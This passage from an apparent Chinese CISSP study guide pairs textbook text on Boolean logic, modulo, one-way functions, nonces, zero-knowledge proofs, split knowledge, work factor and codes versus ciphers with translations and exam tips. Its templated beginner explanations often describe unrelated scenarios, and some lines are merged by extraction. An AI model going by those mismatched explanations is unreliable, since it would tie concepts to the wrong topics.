加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 08 / PDF P379

第 379 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The AND operation (represented by the ∧ symbol) checks to see whether two values are both true. Table 6.1 shows a truth table that illustrates all four possible outputs for the AND function. In this truth table, the first two columns, X and Y, show the input values to the AND function. Remember, the AND function takes only two variables as input. In Boolean math, there are only two possible values for each of these variables (0=FALSE and 1=TRUE), leading to four possible inputs to the AND function. The X ∧ Y column shows the output of the AND function for the input values shown in the two adjacent columns.

It's this finite number of possibilities that makes it extremely easy for computers to implement logical functions in hardware. Notice in Table 6.1 that only one combination of inputs (where both inputs are TRUE) produces an output value of true. Logical operations are often performed on entire Boolean words rather than single values. Take a look at the following example: TABLE 6.1 AND operation truth table XYX ∧ Y 0 0 0 0 1 0 1 0 0 1 1 1 X: 0 1 1 0 1 1 0 0 Y: 1 0 1 0 0 1 1 1 ___________________________ X ∧ Y: 0 0 1 0 0 1 0 0 Notice that the AND function is computed by comparing the values of X and Y in each column. The output value is TRUE only in columns where both X and Y are true.

OR The OR operation (represented by the ∨ symbol) checks to see whether at least one of the input values is true. Refer to the truth table in Table 6.2 for all possible values of the OR function. Notice that the only time the OR function returns a false value is when both of the input values are false.

中文直译 / 整理

与操作(由∧ 符号表示)用于检查两个值是否均为真。 表6.1展示了与函数所有 四种可能输出的真值表。 在此真值表中,前两列X和Y显示了与函数的输入值。 请记住,与函数仅接受两个变量作为输入。 在布尔数学中,每个变量只有两种 可能的值(0=假和1=真),因此与函数共有四种可能的输入。 X ∧ Y列显示了对 应前两列输入值的与函数输出结果。 正是这种有限的可能性,使得计算机在硬 件中实现逻辑函数变得极为容易。 请注意表6.1中,仅有一种输入组合(即两个 输入均为真)会产生真值输出。 逻辑运算通常在完整的布尔字上执行,而不是单个值。 请看以下示例: 表 6.1 AND 运算真值表 X Y X ∧ Y 0 0 0 0 1 0 1 0 0 1 1 1 X: 0 1 1 0 1 1 0 0 Y: 1 0 1 0 0 1 1 1 ___________________________ X ∧ Y: 0 0 1 0 0 1 0 0 请注意,AND 函数是通过比较每列中 X 和 Y 的值来计算的。 只有当 X 和 Y 同 时为真时,输出值才为 TRUE。 OR OR 运算(用 ∨ 符号表示)用于检查输入值中是否至少有一个为真。

有关 OR 函数所有可能值,请参见 表 6.2。 请注意,只有当两个输入值均为假时, OR 函数才会返回假值。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 379 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 09 / PDF P380

第 380 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

TABLE 6.2 OR operation truth table XYX ∨ Y 0 0 0 0 1 1 1 0 1 1 1 1 We'll use the same example we used in the previous section to show you what the output would be if X and Y were fed into the OR function rather than the AND function: X: 0 1 1 0 1 1 0 0 Y: 1 0 1 0 0 1 1 1 ___________________________ X ∨ Y: 1 1 1 0 1 1 1 1 NOT The NOT operation (represented by the ~ symbol) simply reverses the value of an input variable. This function operates on only one variable at a time. Table 6.3 shows the truth table for the NOT function.

TABLE 6.3 NOT operation truth table X~X 0 1 1 0 In this example, you take the value of X from the previous examples and run the NOT function against it: X: 0 1 1 0 1 1 0 0 ___________________________ ~X: 1 0 0 1 0 0 1 1 Exclusive OR The final logical function you'll examine in this chapter is perhaps the most important and most commonly used in cryptographic applications—the exclusive OR (XOR) function. It's referred to in mathematical literature as the XOR function and is commonly represented by the ⊕ symbol. The XOR function returns a true value when only one of the input values is true. If

中文直译 / 整理

表 6.2 OR 运算真值表 X Y X ∨ Y 0 0 0 0 1 1 1 0 1 1 1 1 我们将使用上一节中的相同示例,向您展示如果将 X 和 Y 输入到 OR 函数而非 AND 函数时的输出结果: X: 0 1 1 0 1 1 0 0 Y: 1 0 1 0 0 1 1 1 ___________________________ X ∨ Y: 1 1 1 0 1 1 1 1 NOT 非运算(用 ~ 符号表示)简单地反转输入变量的值。 此函数一次仅作用于一 个变量。 表 6.3显示了非函数的真值表。 表 6.3 非运算真值表 X ~X 0 1 1 0 在此示例中,您将从前面的示例中获取 X 的值,并对其应用非运算: X: 0 1 1 0 1 1 0 0 ___________________________ ~X: 1 0 0 1 0 0 1 1 异或 本章将要研究的最终逻辑函数可能是密码学应用中最重要且最常用的异或 (XOR)函数。 在数学文献中,它被称为XOR函数,通常用⊕ 符号表示。 当 且仅当输入值中只有一个为真时,XOR函数返回真值。 如果

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 380 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 10 / PDF P381

第 381 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

both values are false or both values are true, the output of the XOR function is false. Table 6.4 provides the truth table for the XOR operation. TABLE 6.4 Exclusive OR operation truth table XYX ⊕ Y 0 0 0 0 1 1 1 0 1 1 1 0 The following operation shows the X and Y values when they are used as input to the XOR function: X: 0 1 1 0 1 1 0 0 Y: 1 0 1 0 0 1 1 1 ___________________________ X ⊕ Y: 1 1 0 0 1 0 1 1 Modulo Function The modulo (mod) function is extremely important in the field of cryptography. Think back to the early days when you first learned division.

At that time, you weren't familiar with decimal numbers and compensated by showing a remainder value each time you performed a division operation. Computers don't naturally understand the decimal system either, and these remainder values play a critical role when computers perform many mathematical functions. The modulo function is, quite simply, the remainder value left over after a division operation is performed. The modulo function is just as important to cryptography as the logical operations are. Be sure you're familiar with its functionality and can perform simple modular math.

The modulo function is usually represented in equations by the abbreviation mod, although it's also sometimes represented by the % symbol. Here are several inputs and outputs for the modulo function: 8 mod 6 = 2 6 mod 8 = 6

中文直译 / 整理

两个值均为假或两个值均为真时,XOR函数的输出为假。 表6.4给出了XOR运算的 真值表。 表 6.4 异或运算真值表 X Y X ⊕ Y 0 0 0 0 1 1 1 0 1 1 1 0 以下操作展示了当 X 和 Y 作为 XOR 函数的输入时的值:X 和 Y X: 0 1 1 0 1 1 0 0 Y: 1 0 1 0 0 1 1 1 ___________________________ X ⊕ Y: 1 1 0 0 1 0 1 1 模运算 模(mod)运算在密码学领域中极为重要。 回想一下你最初学习除法的早期阶 段,那时你还不熟悉小数,每次进行除法运算时都会用余数来表示结果。 计算 机同样不自然地理解十进制系统,而这些余数值在计算机执行许多数学运算时 起着至关重要的作用。 模运算很简单,就是执行除法运算后剩余的余数值。 模运算对密码学的重要性,就如同逻辑运算一样。 请确保你熟悉其功能, 并能进行简单的模运算。 模运算函数在方程中通常用缩写 mod 表示,尽管有时也用 % 符号表示。 以下 是模运算函数的几个输入和输出示例: 8 模 6 = 26 模 8 = 6

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 381 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 11 / PDF P382

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

10 mod 3 = 1 10 mod 2 = 0 32 mod 8 = 0 32 mod 26 = 6 We'll revisit this function in Chapter 7 when we explore the RSA public key encryption algorithm (named after Ron Rivest, Adi Shamir, and Leonard Adleman, its inventors). One-Way Functions A one-way function is a mathematical operation that easily produces output values for each possible combination of inputs but makes it impossible to retrieve the input values. Public key cryptosystems are all based on some sort of one-way function. In practice, however, it's never been proven that any specific known function is truly one-way.

Cryptographers rely on functions that they believe are one-way, but it's always possible that they might be broken by future cryptanalysts. Here's an example. Imagine you have a function that multiplies three numbers together. If you restrict the input values to single-digit numbers, it's a relatively straightforward matter to reverse-engineer this function and determine the possible input values by looking at the numerical output. For example, the output value 15 was created by using the input values 1, 3, and 5. However, suppose you restrict the input values to five-digit prime numbers.

It's still quite simple to obtain an output value by using a computer or a good calculator, but reverse-engineering is not quite so simple. Can you figure out which three prime numbers were used to obtain the output value 10,718,488,075,259? Not so simple, eh? (As it turns out, the number is the product of the prime numbers 17,093; 22,441; and 27,943.) There are actually 8,363 five-digit prime numbers, so this problem might be attacked using a computer and a brute-force algorithm, but there's no easy way to figure it out in your head, that's for sure! Nonce Cryptography often gains strength by adding randomness to the encryption process.

One method by which this is accomplished is through the use of a nonce. A nonce (from the phrase “number used once”) is a random number that acts as a placeholder variable in mathematical functions. When the function is executed, the nonce is replaced with a random number generated at the moment of processing for one-time use. The nonce must be a unique 10 mod 3 = 1 10 mod 2 = 0 32 mod 8 = 0 32 mod 26 = 6

中文直译 / 整理

我们将在第7章中重新讨论这个函数,届时我们将探讨RSA公钥加密算法 (以其发明者Ron Rivest、Adi Shamir和Leonard Adleman命名)。 单向函数 一个单向函数是一种数学运算,它能够轻松地为每个可能的输入组合生成输出 值,但却无法反向推导出输入值。 公钥加密系统都基于某种单向函数。 然而, 在实践中,从未证明任何已知的具体函数确实是单向的。 密码学家依赖于他们 认为是单向的函数,但这些函数始终可能被未来的密码分析者破解。 举个例子。 假设你有一个将三个数字相乘的函数。 如果将输入值限制为个位数, 那么通过观察数值输出来逆向推导出可能的输入值相对简单。 例如,输出值15 是由输入值1、3和5生成的。 然而,假设你将输入值限制为五位数的质数。 使用 计算机或高性能计算器来获得输出值仍然相当简单,但逆向推导却不再那么容 易了。 你能算出是哪三个质数相乘得到了输出值10,718,488,075,259吗? 显然 没那么简单,对吧? (事实上,这个数是质数17,093、22,441和27,943的乘积。

) 实际上,共有8,363个五位数质数,因此可以使用计算机和暴力算法来攻击这个 问题,但毫无疑问,你绝不可能在脑海中轻易算出答案! 随机数 密码学通常通过在加密过程中添加随机性来增强安全性。 实现这一目标的一种 方法是使用随机数。 一个nonce(来自“一次性使用的数字”这一短语)是一 个在数学函数中充当占位符变量的随机数。 当函数执行时,nonce 会被在处 理时刻生成的随机数替换,用于一次性使用。 nonce 必须是唯一的

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
学习单元 12 / PDF P383

第 383 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

number each time it is used. One of the more recognizable examples of a nonce is an initialization vector (IV), a random bit string that is the same length as the block size (the amount of data to be encrypted in each operation) and is XORed with the message. IVs are used to create unique ciphertexts every time the same message is encrypted using the same key. Zero-Knowledge Proof One of the benefits of cryptography is found in the mechanism to prove your knowledge of a fact to a third party without revealing the fact itself to that third party. This is often done with passwords and other secret authenticators.

The classic example of a zero-knowledge proof involves two individuals: Peggy and Victor. Peggy knows the password to a secret door located inside a circular cave, as shown in Figure 6.2. Victor would like to buy the password from Peggy, but he wants Peggy to prove that she knows the password before paying her for it. Peggy doesn't want to tell Victor the password for fear that he won't pay her later. The zero-knowledge proof can solve their dilemma.

中文直译 / 整理

每次使用时都必须是一个不同的数字。 nonce 的一个更易识别的例子是初 始化向量(IV),它是一个与块大小(每次操作中要加密的数据量)长度 相同的随机比特串,并与消息进行异或运算。 IV 用于在使用相同密钥加密 相同消息时,每次都生成唯一的密文。 零知识证明 密码学的一个好处体现在一种机制中:你可以在不向第三方透露事实本身的情 况下,向第三方证明你对某一事实的了解。 这通常通过密码和其他秘密认证工 具来实现。 经典的零知识证明示例涉及两个人:佩吉和维克多。 佩吉知道位于圆形洞穴内 一扇秘密门的密码,如零知识证明所示。 维克多希望从佩吉那里购买密码,但 他希望佩吉在收到付款前证明她确实知道密码。 佩吉不愿告诉维克多密码,以 免他事后不付钱。 零知识证明可以解决他们的困境。 图6.2。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 383 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
学习单元 13 / PDF P384

第 384 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 6.2 The magic door Victor can stand at the entrance to the cave and watch Peggy depart down path 1. Peggy then reaches the door and opens it using the password. She then passes through the door and returns via path 2. Victor saw her leave down path 1 and return via path 2, proving that she must know the correct password to open the door. Zero-knowledge proofs appear in cryptography in cases where one individual wants to demonstrate knowledge of a fact (such as a password or key) without actually disclosing that fact to the other individual. This may be done through complex mathematical operations, such as discrete logarithms and graph theory.

Split Knowledge When the information or privilege required to perform an operation is divided among multiple users, no single person has sufficient privileges to compromise the security of an environment. This separation of duties and two-person control contained in a single solution is called split knowledge.

中文直译 / 整理

图 6.2 魔法之门 维克多可以站在洞穴入口,观察佩吉从路径1离开。 佩吉到达门后,使用密码打 开门,穿过门后从路径2返回。 维克多看到她从路径1离开并从路径2返回,这证 明她必须知道正确的密码才能打开门。 零知识证明出现在密码学中,当一个人希望向另一个人证明自己知道某个事实 (如密码或密钥),而无需实际披露该事实时。 这可以通过复杂的数学运算实 现,例如离散对数和图论。 密钥分隔 当执行操作所需的信息或权限分散在多个用户之间时,任何单个用户都不具 备足以危及环境安全的权限。 这种在单一解决方案中包含的职责分离和双人 控制被称为分割知识。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 384 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 14 / PDF P385

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

The best example of split knowledge is seen in the concept of key escrow. In a key escrow arrangement, a cryptographic key is stored with a third party for safekeeping. When certain circumstances are met, the third party may use the escrowed key to either restore an authorized user's access or decrypt the material themselves. This third party is known as the recovery agent. In arrangements that use only a single-key escrow recovery agent, there exists an opportunity for fraud and abuse of this privilege, as the single recovery agent could unilaterally decide to decrypt the information.

The M of N Control concept requires that a minimum number of agents (M) out of the total number of agents (N) work together to perform high-security tasks. So, implementing three of eight controls would require three people out of the eight with the assigned work task of key escrow recovery agent to work together to pull a single key out of the key escrow database (thereby also illustrating that M is always less than or equal to N). Work Function You can measure the strength of a cryptography system by measuring the effort in terms of cost and/or time using a work function or work factor.

Usually the time and effort required to perform a complete brute-force attack against an encryption system is what the work function represents. The security and protection offered by a cryptosystem is directly proportional to the value of the work function/factor. The size of the work function should be matched against the relative value of the protected asset. The work function need be only slightly greater than the time value of that asset. In other words, all security, including cryptography, should be cost-effective and costefficient. Spend no more effort to protect an asset than it warrants, but be sure to provide sufficient protection.

Thus, if information loses its value over time, the work function needs to be only large enough to ensure protection until the value of the data is gone. In addition to understanding the length of time that the data will have value, security professionals selecting cryptographic systems must understand how emerging technologies may impact cipher-cracking efforts. For example, researchers may discover a flaw in a cryptographic algorithm next year that renders information protected with that algorithm insecure. Similarly, technological advancements in cloud-based parallel computing and quantum computing may make brute-force efforts much more feasible down the road. Ciphers

中文直译 / 整理

分割知识的最佳示例体现在密钥托管概念中。 在密钥托管安排中,加密密钥由 第三方保管。 当满足某些条件时,第三方可以使用托管密钥来恢复授权用户的 访问权限,或自行解密数据。 该第三方被称为恢复代理。 在仅使用单一密钥托 管恢复代理的安排中,存在欺诈和滥用此权限的机会,因为单一恢复代理可能 单方面决定解密信息。 M出N控制概念要求在总代理数(N)中,至少有最小 数量的代理(M)协同执行高安全任务。 因此,实施八项中的三项控制,需要八 名被分配密钥托管恢复代理任务的人员中至少有三人协同工作,才能从密钥托 管数据库中提取单个密钥(这也说明了M始终小于或等于N)。 工作函数 您可以通过以成本和/或时间衡量的努力来评估密码系统的强度,这被称为工作 函数或工作因子。 通常,工作函数表示对加密系统执行完整暴力攻击所需的时 间和努力。 密码系统的安全性和保护程度与工作函数/因子的值成正比。 工作函 数的大小应与受保护资产的相对价值相匹配。 工作函数只需略大于该资产的时 间价值即可。 换句话说,包括密码学在内的所有安全措施都应具有成本效益和 成本效率。 保护资产所投入的努力不应超过其实际价值,但必须确保提供足够 的保护。

因此,如果信息的价值随时间下降,工作函数只需足够大,以确保在 数据价值消失之前提供保护。 除了了解数据保持价值的时间长度外,选择密码系统的安全专业人员还必须理 解新兴技术如何影响破解密码的努力。 例如,研究人员明年可能发现某种密码 算法的漏洞,从而使该算法保护的信息变得不安全。 同样,基于云的并行计算 和量子计算的技术进步,未来可能使暴力破解变得更加可行。 密码

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 15 / PDF P386

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Cipher systems have long been used by individuals and governments interested in preserving the confidentiality of their communications. In the following sections, we'll cover the definition of a cipher and explore several common cipher types that form the basis of modern ciphers. It's important to remember that these concepts seem somewhat basic, but when used in combination, they can be formidable opponents and cause cryptanalysts many hours of frustration. Codes vs. Ciphers People often use the words code and cipher interchangeably, but technically, they aren't interchangeable. There are important distinctions between the two concepts.

Codes, which are cryptographic systems of symbols that represent words or phrases, are sometimes secret, but they are not necessarily meant to provide confidentiality. A common example of a code is the “10 system” of communications used by law enforcement agencies. Under this system, the sentence “I received your communication and understand the contents” is represented by the code phrase “10-4.” Semaphores (visual signaling) and Morse code are also examples of codes. These codes are commonly known by the public and provide for ease of communication. Some codes are secret.

They may convey confidential information using a secret codebook where the meaning of the code is known only to the sender and recipient. For example, a spy might transmit the sentence “The eagle has landed” to report the arrival of an enemy aircraft. Ciphers, on the other hand, are always meant to hide the true meaning of a message. They use a variety of techniques to alter and/or rearrange the characters or bits of a message to achieve confidentiality.

Ciphers convert messages from plaintext to ciphertext on a bit basis (that is, a single digit of a binary code), character basis (that is, a single character of an ASCII or Unicode message or another encoding), or block basis (that is, a fixed-length segment of a message, usually expressed in number of bits). The following sections cover several common ciphers in use today. An easy way to keep the difference between codes and ciphers straight is to remember that codes generally work on words and phrases, whereas ciphers work on individual characters, bits, and blocks.

中文直译 / 整理

密码系统长期以来一直被个人和政府用于保护其通信的机密性。 在以下章节中, 我们将介绍密码的定义,并探讨构成现代密码基础的几种常见密码类型。 重要 的是要记住,这些概念看似相当基础,但当它们结合使用时,可能成为强大的 对手,使密码分析人员耗费大量时间。 代码与密码 人们经常互换使用代码和密码这两个词,但从技术上讲,它们并不可以互换。 这两个概念之间存在重要区别。 代码是代表单词或短语的符号加密系统,有时 是保密的,但并不一定旨在提供机密性。 代码的一个常见例子是执法机构使用 的“10系统”。 在此系统中,句子“我收到了您的通信并理解内容”用代码短 语“10‑4”表示。 旗语(视觉信号)和摩尔斯电码也是代码的例子。 这些代码 通常为公众所熟知,旨在便于通信。 有些代码是保密的,它们使用保密的代码 本传递机密信息,其中代码的含义仅发送方和接收方知晓。 例如,间谍可能发 送句子“鹰已着陆”来报告敌机的到达。 密码则始终旨在隐藏消息的真实含义。 它们使用多种技术来改变和/或重新排列 消息的字符或比特,以实现机密性。

密码将消息从明文转换为密文,基于比特 (即二进制代码的单个数字)、字符(即ASCII或Unicode消息或其他编码的 单个字符)或块(即消息的固定长度段,通常以比特数表示)。 以下部分介绍 几种当前常用的密码。 区分代码和密码的一个简单方法是记住:代码通常作用于单词和短语, 而密码则作用于单个字符、比特和数据块。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
